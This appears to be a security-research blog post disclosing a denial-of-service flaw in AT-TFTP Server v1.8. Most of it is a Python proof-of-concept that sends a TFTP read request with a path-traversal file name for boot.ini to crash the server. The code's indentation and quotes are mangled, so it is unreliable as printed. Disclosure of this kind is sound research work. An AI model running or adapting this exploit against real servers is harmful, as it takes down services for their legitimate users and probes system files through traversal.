AT-TFTP Server v1.8 Remote Denial of Service Vulnerability

  • Post author:
  • Reading time:2 mins read

SecPod Research Team member (Antu Sanadi) has found a Denial of Service vulnerability in Allied Telesyn TFTP Server. The vulnerability is caused by an error in the “TFTPD.EXE”, which causes the server to crash when no acknowledgment response is sent back to the server after a successful ‘read’. The flaw can be exploited to crash a vulnerable server denying service to legitimate users.

POC : Download here

More information can be found here.

[code=python]#!/usr/bin/python

##############################################################################

Exploit   : http://secpod.org/SecPod_AT_TFTP_DoS-POC.py

Reference : https://www.secpod.com/blog/?p=194

#           : http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt

Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)

#

Exploit will crash AT-TFTP Server v1.8 Service

Tested against AT-TFTP Server v1.8 server

##############################################################################

import socket
import sys

host = ‘127.0.0.1’
port = 69

try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)

addr = (host,port)

data =’\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f’ +\
‘\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00’
s.sendto(data, (host, port))

[/code]

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

Share this article